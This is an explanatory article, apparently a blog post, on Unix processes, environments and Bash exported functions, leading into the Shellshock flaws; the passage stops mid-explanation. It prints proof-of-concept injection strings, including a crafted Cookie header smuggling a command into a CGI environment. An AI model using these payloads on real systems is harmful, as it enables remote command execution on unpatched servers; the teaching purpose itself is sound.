In late September and early October 2014 the world learned of a security vulnerability that had been lurking for years in the GNU Bourne Again Shell (a.k.a. Bash). Most IT-security outlets covered the topic promptly and published appropriate remediation methods, yet what caught my attention was the educational aspect of the flaw – in that regard it is a “good bug”, that is, one that can be used to explain many interesting mechanisms present in Unix-like systems.
The Shellshock vulnerability (also known as Bashdoor) is a security flaw in the Unix shell Bash that allows local and remote execution of arbitrary code (RCE) with the privileges of the user who runs the shell. It is dangerous because many widely available network services rely on the shell indirectly – for instance, web servers equipped with CGI interfaces, DHCP clients, and not uncommonly mail servers or PHP applications that invoke the shell in order to launch a program within the proper environment.
The root cause of the bug in Bash is insufficient filtering of input data coming from the environment inherited from the parent process. It allows so-called exported shell functions to be used as a vehicle for smuggling arbitrary commands into a spawned shell process. Commands injected this way are executed by the shell immediately after start-up, at the moment it reads the received set of environment variables.
As a result, a potential attacker can influence the behaviour of services and modify their resources. In the best case this means discrediting a given network service; in the worst case – taking control of the entire system (when the service runs with administrator privileges or additional flaws are found).
Let’s assume that we know little about Unix-like systems, that the word “shell” reminds us of a sea creature’s armour rather than a command interpreter, and that “environment” brings to mind ecology rather than a data structure. To understand the topic thoroughly, we need to recall:
- What characterises Unix-like systems?
- What is a Unix shell?
- How does a process differ from a program, and what is an environment?
- How does Bash handle the environment and what are environment variables?
- What conditions trigger the flaw in Bash?
- What other vulnerabilities were found along the way?
- How were the problems resolved?
If the operating-system mechanisms governing process environments are not new to you, you know what execve() and fork() do, and you are also aware that the environment can contain not only variables but arbitrary strings, skip ahead to the technical descriptions of the flaws themselves.
Introduction
Long, long ago almost every user of a computer system was a programmer. Those were the days of environments in which the “conversation” with the operating system was carried out through an integrated code editor and debugger. Unixes had not yet risen to prominence, and the relational databases that are commonplace today – running on dedicated machines – existed only in the dreams of the people selling those machines. Data were code, code were data, and a programmer could reach into their structures without wondering where they were actually stored. The age of mainframes.
IT security as an industry practically did not exist, systems had no effective division into users with different access levels, and anyone who could use a terminal enjoyed unrestricted access to almost every service and piece of data within the system. One might think that from an IT-security perspective this was – to put it colloquially – a spectacular failure. Perhaps, but the asset-protection model was also somewhat different, and had it evolved along the trajectory established at that time until the present day, security flaws might have been fewer in number and would certainly have had a different character.
When thinking about the monolithic systems of the past, it is worth remembering that they were closer to today’s virtual machines than to multi-user operating systems. This means that defence against cyber threats was possible, but it operated at the level of access to a service or even to the memory structures managed by a programming-language interpreter, rather than as a generalized network or system-level shield. One may speculate that had the IT-security business not proposed defensive models that abstract protection processes and correlate them with organisational structures, but instead moved towards developing ways of blocking unwanted activity at the core (within a service, an application, or even a programming language), those environments – were they to exist today – would embody what we now call the zero-trust approach.
Unix
The arrival of Unix shook the technology industry. Not because of particularly advanced technical solutions or user-friendliness, but because of an architecture that allowed one to adapt the system to one’s own needs and to create clones tailored to specific requirements at low cost. This was tied, among other things, to decoupling the system from the hardware, as well as to the ability of its buyer to work with many software vendors rather than a single institution that produced both the system and every application running under its control.
Functional languages that were hard for beginners to pick up quickly, and interpreters oriented towards solving specific business problems, gave way to universal tools written in C and to shell scripts. The C programs were compiled into machine code optimised for the given hardware architecture. Meanwhile, the architectural division of the system into small, cooperating parts lowered the competency bar for technical support – an administrator was a machine operator, not an all-round specialist in everything from data management to programming.
Unix is, in essence, a set of cooperating components, each performing a specific task. A system architect can integrate selected components in order to build an environment for a particular purpose. This also translates into the final price, which was not without influence on the popularisation of Unix. It is also worth noting that Unix vendors were very effective promoters. Before long, the bulk of technical-school graduates entered the job market with practical skills in C programming and the use of Unix commands and services. The creators of Unix – Dennis Ritchie and Ken Thompson of Bell Labs – had managed to build a universal, multi-user, multi-process, networked, time-sharing operating system that nearly every institution could afford.
For the operator’s “chats” with the system, purpose-built software was used. Naturally, one could have continued the programming tradition and used, say, Lisp – one of the most illustrious programming languages, popular once and now, thanks to projects such as Clojure, enjoying a second youth. It would have served as a system user interface, but only on condition that the user already had experience with it (was de facto a programmer). For someone who simply wants to start or stop a service, copy a file, or inspect event-log files, a far better tool is a tailor-made interpreter whose commands and syntax can be learned in a few hours.
The shell
Every computer system meant to be operated by a person who is not a programmer
deserves a communication interface that lets them browse the computer’s resources,
launch applications, issue commands, and view the results. Such an interface can be
graphical (e.g., Apple’s Finder) or textual (e.g., COMMAND.COM from MS-DOS,
or Unix’s bash). It will certainly accept input via the keyboard (and possibly
a mouse) and present the results on the computer’s monitor (or a remote terminal). We
call this an interactive system shell – one through which a user can communicate
with the OS in real time.
A system shell (or simply shell) is a computer program like any other. Its function is to provide the conditions for performing basic operational tasks such as accessing files and directories or launching programs.
An interactive shell is a foreground process (a running program) that executes
issued commands on the fly and displays their results, whereas a non-interactive
shell does the same work without supervision from a human operator. In
Unix-like systems an interactive shell is launched with the credentials of an
authenticated user by software that provides local or remote access to the system
(e.g., the login program or the sshd daemon).
The pathname of the default shell assigned to a given user can be found in the
password file /etc/passwd or another database (e.g., LDAP or NSS, if in use). In
most cases a shell that can work interactively also supports a non-interactive mode.
Modern shells contain a sophisticated command interpreter. This enables them not only to accept individual commands or sequences thereof, but also to interpret and execute scripts – simple programs written using the appropriate internal and external commands.
Internal commands are those whose actions are carried out directly by the shell’s
own subroutines within its own program, whereas external commands are separate
utility programs residing on a storage medium – for example, the familiar Unix tools
ping, grep, awk, sed, or mc (Midnight Commander). The shell launches them,
waits for them to finish, and records each one’s exit status.
The first Unix shell was the Thompson shell, created in 1971 and written by – as the name suggests – one of the system’s co-creators. It was a simple command interpreter, lacking the ability to execute scripts. Following an idea pioneered in Multics, Unix’s conceptual predecessor, it was implemented as a standalone utility program rather than as part of the kernel – still an innovation compared with most operating systems of the day. From a security standpoint this was a sensible move, since otherwise any flaw in the command interpreter would have meant taking control of the entire system.
When mentioning the Thompson shell it is worth recalling that it was the first to
employ the stream-redirection operators < and > as well as the pipe operator
| – a convention later adopted by most known shells.
Program and process
We mentioned earlier that the system shell is a computer program. This means that somewhere on a storage medium (e.g., a hard disk) there is a data set with a beginning, a defined length, a certain name, and other attributes (for instance, an access-mode word specifying who may access the data and in what mode – e.g., write, read, or execute). We call such a data set a file.
In Unix-like systems the goal is for everything to be a file, or more precisely, for most system objects to be communicable through files that represent their input and output. To make this possible, some files are so-called special files. Their contents do not reside on disk but are generated dynamically and depend on a subroutine associated with the special file (e.g., a device driver).
Back to the definition of a program. A program is a set of machine instructions and the data needed for their proper execution, placed in memory or in a so-called executable file. An executable file is one designated for running and containing a program image. What is a program image? It is a chain of CPU-intelligible instructions shaped according to the rules of one of the executable formats. Popular Unix formats include, for example, a.out (short for assembler output) and Executable and Linkable Format (a.k.a. ELF).
Thanks to a known executable format the system knows what a program needs in order to
load and work properly. An example might be shared libraries that the application
must reference – at an appropriate, standard-defined location within the executable
file one finds references to the required libraries or even to the interpreter that
will correctly load and execute the code (in the case of the ELF format, the
PT_INTERP segment).
A process is, as we mentioned, a running program – or, to be more linguistically precise, the execution of a program. When the processor executes machine code placed in RAM, we can speak of a running process.
From the system’s perspective, a process denotes not only the act of carrying out
a task, but also a more tangible quality: a data structure in memory managed by
the kernel, through which the OS controls the correct course of the process – among
other things, it ensures fair time-slicing, memory allocation, access to hardware
resources, and mechanisms for exchanging data with other processes. This means that
every time a program is loaded into memory for execution, a corresponding control
structure is created (e.g., in GNU/Linux, task_struct defined in the header file
sched.h), containing, for instance, privilege-related identifiers (UID, GID, EUID,
EGID, SUID, SGID, FSUID, FSGID), information about the parent and children,
scheduling data, and so on.
The way to load a program from disk and run it is to ask the kernel to perform such
an operation. To this end, a running program should use the system call named
execve, whose C-language declaration looks as follows:
int execve(const char *filename,
char *const argv[],
char *const envp[]);
We can see that it takes three arguments:
- the pathname of the file to load (as a pointer to a null-terminated character string),
- the command-line arguments (as a constant pointer to an array of character strings),
- and the environment (likewise a constant pointer to an array of character strings).
The arrays holding the arguments and the environment should be terminated with
a null pointer (NULL – a zero value standing in for a memory address), and each
character string (i.e., each character array) – like the first argument – should be
terminated with a zero byte.
The kernel will check whether the process has permission to run the program and will
attempt to load it from the file into free memory. If this operation succeeds, the
current process (in the sense of the structure maintained by the kernel) will be
associated with the newly loaded machine code, which will begin executing. This means
that upon a successful execve() call, the program image that had been running
within the current process ceases to exist, and its associated memory structures
(code segment, initialized-data segment, uninitialized-data segment, as well as the
stack and heap segments) are freed. What is inherited is the process’s
identifier (PID).
Given the above, we also need a mechanism that would let a running program “bring to life” an additional process so that this second one can load a new program, ending its own previous work. Otherwise we could only have a single application running at a time – within a single process, program images and data would simply keep replacing one another.
Fortunately such a system call exists, and it is called fork. The process that
invokes it becomes the parent process with respect to the newly created one, and
shares code and most parameters with it. The child process can recognize that it
is the child because in its thread of execution fork() returns 0. The new process
can now safely call execve() and load a program “into itself”. The parent process,
in turn, can supervise the execution of its child while waiting for it to finish –
this is exactly how the shell behaves when we issue an external command.
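As a minimal sketch (assuming a GNU/Linux system with /bin/date present), this is essentially what a shell does for every external command: fork, execve() in the child, and wait in the parent:
#include <stdio.h>
#include <sys/wait.h>
#include <unistd.h>
int main(void)
{
    pid_t pid = fork();     /* duplicate the current process */
    if (pid == 0) {
        /* child: replace our program image with /bin/date */
        char *const argv[] = { "date", (char *) NULL };
        char *const envp[] = { (char *) NULL };
        execve("/bin/date", argv, envp);
        perror("execve");   /* reached only if loading failed */
        return 1;
    }
    /* parent: supervise the child and record its exit status,
       just as a shell does for an external command */
    int status;
    waitpid(pid, &status, 0);
    printf("child exited with status %d\n", WEXITSTATUS(status));
    return 0;
}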
Inter-process communication
Programs that communicate solely with the user and occasionally ask the kernel for resource access are boring programs, and if they could dream, their only fantasy would probably be to hang. They feel best when “talking” to one another. That is why system architects once came up with the idea of implementing inter-process communication (IPC) methods – ways of exchanging information between running programs.
We can distinguish remote communication, involving systems visible on the network; an example of a mechanism for this would be sockets.
Richer in terms of the number of mechanisms, however, is local communication, used within a single system. Its examples include: signals, semaphores, shared memory, message queues, pipes, named pipes, Unix domain sockets, command-line arguments, ordinary files, memory-mapped files, and the environment.
IPC objects are created and removed by the kernel upon invocation of specific system calls by the software that needs them. Some allow two-way communication (sockets, shared memory, files), while others only permit sending a message or signalling some state without obtaining feedback through the same channel (signals, arguments, the environment, messages, individual pipes).
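By way of illustration, here is a minimal sketch of one of the one-way mechanisms named above – an anonymous pipe shared between a parent and its forked child:
#include <stdio.h>
#include <unistd.h>
int main(void)
{
    int fd[2];
    char buf[32];
    if (pipe(fd) == -1)     /* fd[0]: read end, fd[1]: write end */
        return 1;
    if (fork() == 0) {
        /* child: inherits both descriptors, sends one message */
        close(fd[0]);
        write(fd[1], "hello via pipe", 14);
        return 0;
    }
    /* parent: reads what the child wrote */
    close(fd[1]);
    ssize_t n = read(fd[0], buf, sizeof buf - 1);
    if (n > 0) {
        buf[n] = '\0';
        printf("parent received: %s\n", buf);
    }
    return 0;
}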
Of all these mechanisms, the Shellshock vulnerability is connected to one in particular – the environment.
The process environment
The environment is an inter-process communication mechanism that allows a one-way transfer of a certain set of information – in the form of a set of character strings – to a program being loaded into memory. It resembles sending a letter from a program already running on the system to a program that is only now being loaded by it. When the latter starts working and becomes a process, it will have the transmitted environment information at its disposal.
The environment is typically used to control the behaviour of the invoked program – provided, of course, that the launched program makes use of the received environment data.
One might therefore ask: why use the environment when we have command-line arguments that also allow this?
An important property distinguishing environment-based communication from
argument-based invocation is inheritance. It is carried out automatically by the
system when forking a child process, and also by a widely followed convention in
which, when calling execve() – or the wrapper functions execle() and
execvpe() – a copy of the current environment is passed to the loaded program. The
frequently used program-loading functions execl(), execlp(), execv(),
execvp(), system(), and popen() likewise forward the existing environment.
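As a quick illustration of this convention (the variable name GREETING is made up for the example), a variable placed in the parent’s environment is visible, without any argument passing, inside the shell command run by system():
#include <stdlib.h>
int main(void)
{
    /* add GREETING to this process's environment */
    setenv("GREETING", "hello from the parent", 1);
    /* system() runs "sh -c <command>" in a child process;
       the child inherits a copy of our environment, so the
       variable is visible there with no argument passing */
    return system("echo \"$GREETING\"");
}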
The size of the transmitted environment is limited. In newer Linux kernels it depends
on the value of RLIMIT_STACK, which an administrator can set for certain process
groups, and amounts to at most one quarter of the stack size (so that the stack
is not entirely consumed by the environment). The system also ensures that despite
these limits the size is never less than 32 memory pages (which, at a page size of 4
KB, gives a floor of 128 KB). The limit for a single character string is defined
by the kernel constant MAX_ARG_STRLEN and is likewise 32 pages (since Linux kernel
2.6.23). The maximum number of strings is 0x7FFFFFFF (2,147,483,647 in decimal) –
this follows from the range of a 32-bit signed integer.
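These limits can be inspected at run time. A minimal sketch using the POSIX sysconf() call, which reports the combined argument-plus-environment limit (ARG_MAX):
#include <stdio.h>
#include <unistd.h>
int main(void)
{
    /* ARG_MAX bounds the combined size of the argument and
       environment arrays accepted by execve() */
    long arg_max = sysconf(_SC_ARG_MAX);
    printf("ARG_MAX on this system: %ld bytes\n", arg_max);
    return 0;
}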
At the system level the only requirement is that the environment be an array of
character strings (i.e., an array of character arrays) terminated by a null pointer
(NULL), and that each pointer in it reference a character array terminated with
a zero byte. The entries need not even be conventional name–value pairs; they can
be arbitrary data, for instance:
A perfectly valid
environment passed
to the launched program
A=1
B=2
When loading a new program via execve(), one can pass an environment – the
aforementioned array – to the launched application. In GNU/Linux it will be stored
(after copying) in the mm_struct structure (fields env_start and env_end);
a pointer to this structure (the field mm) resides in the previously mentioned
control structure task_struct that describes the task executed by the system.
Let us try to write a simple program that creates an appropriate environment and
passes it to an invoked /bin/bash shell. We will supply the shell with an option
that causes it to display its own environment and exit.
Create a file pass-environment.c with the following contents:
#include <unistd.h>
int main(int argc, char *argv[])
{
/* environment array */
char *const environment[] = {
"perfectly valid",
"environment passed",
"to the launched program",
"A=1",
"B=2",
(char *) NULL
};
/* invocation arguments */
char *const arguments[] = {
"sh",
"-c",
"tr '\\0' '\\n' < /proc/$$/environ",
(char *) NULL
};
return execve( "/bin/bash", arguments, environment );
}
Compile it with GCC and run:
gcc -Wall ./pass-environment.c -o ./pass-environment
./pass-environment
We should see a listing similar to the following:
perfectly valid
environment passed
to the launched program
A=1
B=2
What happened? We loaded the shell, passing it a specially crafted environment
containing two name-value pairs and several plain-text strings. We also passed the
shell an option (-c) in the form of an argument instructing it not to wait for
interactive commands but to execute the given command sequence (c for command),
which can be presented more readably as:
tr '\0' '\n' < /proc/$$/environ
Readers familiar with the shell built-in set and the external tools env and
printenv may wonder why we did not use those instead. In the case of the latter
two, the reason is that they would be invoked in a child process because they are
external commands; as for set, it would show all shell variables (and
functions), not the environment, even though some of those variables may have come
from the environment or be destined for it. In none of these cases would the current
shell process’s environment be accurately represented.
Using the procfs pseudo-filesystem gives us access to the pseudo-file
/proc/[PID]/environ, whose contents reflect the environment of the process with
a given process identifier (PID). To learn the shell’s own PID, we use the
special variable $$.
The data obtained are in a “raw”, unprocessed form, and we need to replace all zero
bytes with newlines. The external tool tr makes this easy.
As a result, the screen shows exactly the environment we would expect, including the strings we placed there. Whether Bash actually makes use of them is another matter. We can check by modifying our program slightly:
#include <unistd.h>
int main(int argc, char *argv[])
{
/* environment array */
char *const environment[] = {
"perfectly valid",
"environment passed",
"to the launched program",
"A=1",
"B=2",
(char *) NULL
};
/* invocation arguments */
char *const arguments[] = {
"sh",
"-c",
"exec printenv",
(char *) NULL
};
return execve( "/bin/bash", arguments, environment );
}
The result will be:
A=1
B=2
PWD=/home/randomseed
SHLVL=0
The attentive reader will notice that some of the transmitted strings are missing from the output. Outrageous! Scandalous! Who is to blame?
In the previous example we ruled out the shell process itself removing our phrases
from the environment; what remains is the possibility that Bash ignores
them. Notice that the invocation /bin/bash -c 'exec printenv' replaces the shell
process with the loaded program (the built-in exec command is responsible for
this). The displayed contents are therefore not a reflection of the environment
of the originally launched shell process but of the printenv that replaced it.
Where, then, do the entries originating from the initially created environment
(A=1, B=2) come from, along with the new ones of unknown provenance
(PWD=/home/randomseed, SHLVL=0)? It turns out that the shell copied its own
environment and, after adding certain data, used the resulting set to initialize
the environment for the loaded printenv program.
Conclusion: the shell ignores entries in the environment that it cannot process (they are unintelligible to it); these entries are not copied into the environments of processes launched by the shell, but they are not removed from the shell’s own memory either.
It is worth remembering that when using Bash or a similar Unix shell we are not operating directly on the process’s environment, even though the manuals repeatedly speak of adding or removing data from the environment.
By using built-in commands such as set (typeset), unset, or export, we affect
the shell’s internal data structures but not the memory area actually associated
with the environment. That area is modified and set up lazily – that is, only
when necessary, for example when another program is loaded (within the current
process or in a newly created child process).
The above can be observed by compiling and running the following code:
#include <unistd.h>
int main(int argc, char *argv[])
{
/* environment array */
char *const environment[] = {
"A=1",
"B=2",
(char *) NULL
};
/* invocation arguments */
char *const arguments[] = {
"sh",
"-c",
"export E='NEW' ; pi=$$ ; "
"echo 'Bash process:' ; "
"cat /proc/$pi/environ | tr '\\0' '\\n' ; "
"echo ; "
"echo 'Child process:' ; "
"cat /proc/self/environ | tr '\\0' '\\n' ; "
"echo ; "
"echo 'Same process, different program:' ; "
"exec printenv",
(char *) NULL
};
return execve( "/bin/bash", arguments, environment );
}
We now know how the environment is passed, so it is worth mentioning the ways in which a running program can access its own environment. The first uses the arguments of the main function:
#include <stdio.h>
int main(int argc, char *argv[], char *envp[])
{
char **v;
for(v = envp; *v != NULL; ++v)
printf("%s\n",*v);
return(0);
}
The second uses the external variable environ, defined by the C standard library:
#include <stdio.h>
int main()
{
extern char **environ;
char **v;
for(v = environ; *v != NULL; ++v)
printf("%s\n",*v);
return(0);
}
Environment variables
An environment variable is a variable – a construct possessing a symbolic name and a value – whose storage location is the environment of a running program. In the earlier examples we deliberately avoided this term in order to emphasise that for the operating system it does not matter whether the environment holds variables or other constructs.
Shell programmers, many application developers, and even the C standard library take a more conservative view of the environment. For them it is a repository of name–value pairs, e.g.:
A=1
B=2
C=TEXT
D=
Notice that there are no defined data types for the given values (all of them are originally character strings). Typing is therefore a matter of convention or detection and depends on the receiving process.
The C standard library defines appropriate functions for managing environment
variables: getenv(), setenv(), unsetenv(), putenv(), and clearenv(). All
except the last operate exclusively on variables, which are detected by requiring the
presence of the = character. If the environment contained a character string other
than one defining a variable, it would not be possible to selectively remove or
overwrite it (replace it with a variable of the same name) using these functions.
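A small sketch of these library functions in use (the variable names are arbitrary):
#include <stdio.h>
#include <stdlib.h>
int main(void)
{
    setenv("C", "TEXT", 1);              /* add or overwrite C=TEXT */
    printf("C=%s\n", getenv("C"));
    putenv("D=");                        /* defined, but empty */
    printf("D=%s\n", getenv("D"));
    unsetenv("C");                       /* remove the variable */
    printf("C is %s\n", getenv("C") ? "still set" : "gone");
    return 0;
}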
The environment in Bash
In the case of Bash we encounter an interesting situation – it implements its own
versions of the
functions responsible for handling environment variables. The changes consist mainly
in the fact that reads and writes of variables are buffered – that is, they do
not operate on the environment directly but on internal structures. From these
structures environments are then constructed on the fly and passed to child processes
or to a process replacing the shell (the built-in exec command).
When we look at how Unix-like systems boot – remembering that the only way to create
a new process is to fork the current one using fork() – we can appreciate the
advantage of environment inheritance. System start-up scripts can set certain
environment variables useful to all running programs, which will then propagate and
reach the start-up scripts of individual services; these in turn can add
service-specific variables to their environments. The same applies to the environment
settings of user-launched applications – they inherit environments from shell
processes, which in turn receive them from services providing access to the system
(e.g., login or sshd), and so on.
Some applications allow the user to manage variables in their environment directly (via an interactive interface, inter-process communication, or configuration files). This is useful when appropriate variables that influence a program’s behaviour need to be set but cannot be set from the shell (which is the parent process), because, for example, the program is not launched by the shell or the shell starts too late (and it is its environment we want to prepare). Examples include the tables of the Cron scheduling daemon, as well as situations in which we want to influence the environment of a process (a shell or another program) at the moment a remote SSH connection is established (by sending environment data over the network).
Variables and functions
The Bash shell interpreter lets you use variables and functions. The former are used
to store data, the latter to create subroutines and operate on the former. A variable
in Bash can have a defined scope that determines where in the script it can be
used. By default, variables are global – that is, once defined they are visible
throughout the script executed by the current process. This behaviour can be changed
with the local scope modifier placed before the variable name at the point of its
first use. Such a variable will be visible only within the function in which it
appeared.
A common mistake among beginners is assuming that global variables will be shared with
child processes of the shell. This particularly concerns commands that, because they
receive output from other commands through a pipe, force Bash to create an additional
process. An example is the read command, which here reads the data sent to the
standard output of echo:
#!/bin/bash
l="empty"
echo "123" | read l
echo "${l}"
After running the script, instead of the expected 123, the value of l will be the
string empty. Why? To handle the redirected output from echo (via the pipe
operator, which creates a communication link), the shell created a child process, and
it was in that child that the built-in read command assigned a value to l. All
data belonging to the additional process ceased to exist when it finished, including
the variable l, which does have global scope – but within a given process whose
data the parent cannot access directly. A solution to problems like this may be to
forgo redirection and use a variable that stores the result of a previously executed
command:
#!/bin/bash
l="empty"
l=$(echo -e "123\n456")
echo "${l}"
Another approach is to redirect the standard output of a subshell – a child
process executing a separate command – to the standard input of read. In this case
a child process is also created, but it will not attempt to modify l; that will be
the parent process’s job:
#!/bin/bash
l="empty"
read l < <(echo "123")
echo "${l}"
More examples of dealing with subshells can be found on the Bash Hackers Wiki pages.
Exported variables
There is one more kind of Bash variable that can be distinguished by scope – shell
environment variables, also known as exported variables. These are global-scope
variables that will be placed in the environment of every child process of the shell
and of every program that replaces the shell (when the built-in exec command is
used).
The term “exported” is not very popular, but it aptly captures the difference between actual environment variables (stored in the environment of a given process) and global shell variables that are merely marked as ones that should end up there.
To mark a variable as destined for the environment, the export modifier is
used; it can be applied at any point, e.g.:
export C
A=1
C=3
export B=2
export A
echo "------------------------------"
echo "Actual current environment:"
tr '\0' '\n' < /proc/$$/environ
echo
echo "----------------------------"
echo "Child-process environment:"
printenv
Environmental functions
An environmental function is the Bash developers’ idea for propagating subroutines among child shell processes. It resembles the proverbial guinea pig, which is in reality neither a pig nor from Guinea. Let us take a look:
#!/bin/bash
# define a function
myfunction () {
echo "I am a function" ; a=2;
}
# export the function
export -f myfunction
# check whether the function
# exists in the child
# process's environment
printenv | grep -A2 myfunction
Running the script yields output similar to the following:
myfunction=() { echo "I am a function";
a=2
}
What did we do? We created a Bash function and then marked it as exportable using
export -f. In the child process’s environment (printenv) it appeared as an
environment variable named myfunction whose value is exactly the body of our
function.
It is worth noting that the interpreter had no trouble placing the = character
inside the environment; its internal parser recognizes the values of environment
variables as strings located between the first occurrence of = and the terminating
zero byte.
Environment variables of this kind (carrying Bash functions) are propagated to all
child processes, yet only Bash (or possibly other shells) can subsequently make use
of them. This is reminiscent of the old days – and of present-day programming
languages in which, thanks to the eval instruction, data can become code.
Automatic function definition
Environment variables that in reality contain Bash functions are recognizable by the parser thanks to a pair of parentheses and an opening brace at the start of the value. When the shell encounters such a pattern, the character string from the environment is passed to the interpreter in order to define the function within the current process. For example:
#!/bin/bash
export myfunction="() { echo 'I am a function'; }"
bash -c myfunction
Note: this example will not work in newer, patched releases of Bash.
In the above example we called the function myfunction() in a child process even
though it did not exist in the parent as a function – there it was recorded only
as a variable destined for the environment. The newly started Bash
(bash -c myfunction) examined the received environment and detected that it was
dealing with an exported function. The function was therefore defined under the
name myfunction and then invoked (because of the -c myfunction argument).
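The same import mechanism can be triggered from C, in the style of our earlier examples. The sketch below assumes an old, unpatched Bash – newer, patched releases ignore such entries:
#include <unistd.h>
int main(int argc, char *argv[])
{
    /* a single entry that a pre-patch Bash will parse
       as an exported function definition */
    char *const environment[] = {
        "myfunction=() { echo 'I am a function'; }",
        (char *) NULL
    };
    /* -c myfunction: call the imported function */
    char *const arguments[] = {
        "sh",
        "-c",
        "myfunction",
        (char *) NULL
    };
    return execve( "/bin/bash", arguments, environment );
}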
Imperfections
The environment parser present in Bash is not as flawless as one might think. It turns out that when it encounters an appropriately crafted environment variable that is supposed to contain a function definition, it can also execute additional commands. Consider the following example:
#!/bin/bash
export myfunction="() { echo 'I am a function'; } ; echo 'I am outside'"
bash -c myfunction
This example is similar to the previous one, but this time, in addition to the function body enclosed in braces, we placed a command after the command separator (semicolon). As a result, two strings appeared on the screen:
I am outside
I am a function
Note: this example will not work in newer, patched releases of Bash.
It turns out that the process of interpreting an environment variable as code
defining a function does not stop at the closing brace but continues until the end of
the value string. That is why at start-up the shell displayed I am outside (the
echo command was issued during the reading of the environment), and only then did
the result of calling myfunction() appear.
The Bash developers quickly fixed this bug, eliminating the possibility of appending commands after a function definition. It turns out, however, that this does not protect against all threats…
The Shellshock vulnerability
On 24 September 2014 the IT world was rocked by sensational news: in the popular Bash shell a vulnerability (CVE-2014-6271) had existed for over two decades, through which one could locally – and under certain conditions also remotely – execute arbitrary commands with the privileges of the service. The only requirement is the ability to control the environment of the shell process. The discoverer turned out to be Stephane Chazelas – an IT department manager at the British company SeeByte Ltd, who is passionate about open-source software, especially that which runs on Unix and GNU/Linux systems.
The flaw consisted in the ability to smuggle arbitrary commands by appending them to environment variables containing shell-function definitions. This is exactly the mechanism we demonstrated in the last example, although on the Web one can find a condensed version of the proof-of-concept code:
env x='() { :;}; echo VULNERABLE' bash -c exit
Why did administrators react with panic, and why did the package maintainers of GNU/Linux distributions and other Unixes begin en masse visiting mental-health specialists and massage parlours? After all, the flaw can only be exploited when one already controls the shell’s environment, and so – following the earlier examples – the user would have to be sabotaging themselves!
Unfortunately it turns out that over the years the authors of various tools and network services had trusted environment variables as a mechanism that is well understood and seemingly too simple to harbour any serious weaknesses. The environment itself (from the system’s point of view) certainly is that simple; the problem arises when the ubiquitous Bash misuses it and turns data into instructions.
Why ubiquitous? Many library functions and script subroutines across the most diverse
interpreters, when they want to launch a process, do not load it directly but as a
shell command to be executed. For example, a web script might use a shell-invoked
convert command to resize images:
/bin/sh -c "convert %f -resize 1024x1024 "
/bin/sh -c "convert %f -resize 1024x1024 "
Thanks to this approach the programmer does not need to build separate mechanisms for
setting search-path variables (i.e., PATH or LD_LIBRARY_PATH), configuration
files that will launch the right programs, routines that prepare the working
environment, etc. It suffices to delegate these tedious and laborious tasks to the
shell along with its global and per-user configuration files.
Examples of situations in which the environment of a launched program is controlled by an untrusted client, or in which the client is trusted but can dangerously escalate their ability to perform certain operations, include:
- some mail servers, particularly those that invoke the shell when delivering messages to external filters (e.g., Procmail) or that rely on short, flexible scripts (qmail);
- the Apache web server with CGI enabled (module mod_cgi or mod_cgid), if the executed scripts are written in Bash or invoke it, e.g., via the aforementioned system() or popen() functions;
- the OpenSSH server when the ForceCommand option – whose purpose is to restrict executable commands – is enabled, and also when public keys with a command clause are in use (command injection bypasses the restriction);
- DHCP clients that pass parameters received from servers to their scripts via environment variables – in many cases it is possible to execute malicious code with administrator privileges;
- executables with the set-user-ID-on-execution (setuid) or set-group-ID-on-execution (setgid) bit enabled when they inherit the environment – privilege escalation and execution of commands as another user or even as the administrator are then possible if the application invokes the shell, e.g., via system() or popen().
Example of a vulnerable web server
Let us see how a remote attacker can exploit the Shellshock flaw by attacking a vulnerable web server. A necessary condition is that HTTP headers originating from the client are passed to the application server in the form of environment variables. The application server can be, for instance, a CGI script spawned each time a request needs handling.
Suppose the client set the Cookie header as follows:
Cookie: () { :; }; ping -c 3 randomseed.pl
After the HTTP connection is established, the header reaches the web server which, wanting to pass it to the CGI application, adds an environment variable:
HTTP_COOKIE=() { :; }; ping -c 3 randomseed.pl
The invoked interpreter (e.g., PHP) accepts the environment and, wanting to resize an image, executes:
system("convert -size 300x300 img.jpg -resize 200x200 img_s.jpg");
system("convert -size 300x300 img.jpg -resize 200x200 img_s.jpg");
The PHP function named system used
here is the counterpart of the same function from the C standard library. The latter
in turn does not launch the convert program directly but invokes the shell, passing
it the command and arguments. The shell inherits the environment, and if it
happens to be Bash, it begins importing functions whose definitions it finds in the
values of variables.
In a version vulnerable to the flaw, the command ping -c 3 randomseed.pl will be
executed with the privileges of the application server, sending three echo-request
packets and thus informing the other end that the server is running an affected
release of Bash.
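The whole chain can be condensed into a few lines of C. This is only a sketch: it assumes that /bin/sh on the target points to an unpatched Bash (on many systems it is a different shell, e.g., dash), and the injected echo merely stands in for real malicious code:
#include <stdlib.h>
int main(void)
{
    /* what the web server effectively does: the raw header
       value lands in the environment unmodified */
    setenv("HTTP_COOKIE", "() { :; }; echo INJECTED", 1);
    /* what the application does next: system() starts a shell
       ("sh -c ...") that inherits the environment; a vulnerable
       Bash imports the "function" and runs the appended command
       before convert is even looked up */
    return system("convert -size 300x300 img.jpg -resize 200x200 img_s.jpg");
}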
The first patch
The Bash developers quickly released an appropriate patch, identified as bash43-025, which eliminated the vulnerability.
The fix introduced two processing modes into the function parse_and_execute() –
identified by SEVAL_FUNCDEF and SEVAL_ONECMD. When called in the first mode, the
parser skips commands other than function definitions. The second mode prevents more
than one found command from being executed. As a result, the exploit presented
earlier no longer works because commands appended after the function body are not
interpreted.
The buffer flaw
Users’ and administrators’ relief did not last long. Tavis Ormandy, a Google-affiliated specialist in software vulnerabilities, found a similar flaw. A new vulnerability had to be registered in the bug database – it received the identifier CVE-2014-7169.
The malicious shell code demonstrating the bug looked as follows:
env X='() { (a)=>\' sh -c "echo date"; cat echo
Running this command on a vulnerable interpreter causes the creation of a file named
echo containing the output of the date command, followed by displaying its
contents on screen. The method used to mislead Bash also exploits a parser weakness
during environment reading, but the technique is quite different. Here we are dealing
with a deliberate corruption of the buffer used for storing commands to be executed.
To explain what exactly happens, we will use a more accessible example:
#!/bin/bash
export X='() { function a a>\'
bash -c 'echo date'
We know that when a new shell process (bash) starts, environment variables are
analysed. The contents of one of them – because of the leading parentheses and
opening brace – are treated as the beginning of an exported shell-function
definition. At this point it is worth noting that Bash does not execute commands
immediately; instead they first go into a special buffer. The buffer is helpful
because some syntactic elements require analysis of their neighbours. A vivid example
is:
#!/bin/bash
echo one \
two \
three
The parser does not execute echo right away but places it in the buffer, because
the trailing backslash indicates that the expression will continue.
In our example, during environment analysis the buffer looks as follows:
function a a>\
The interpreter can only make sense of the part function a a (a nested function
definition), and this is processed immediately. What remains in the buffer is:
>\
The purpose of leaving the sequence >\ behind is to influence how the next command
(echo date) will be treated – because it, too, will end up in the buffer. Now,
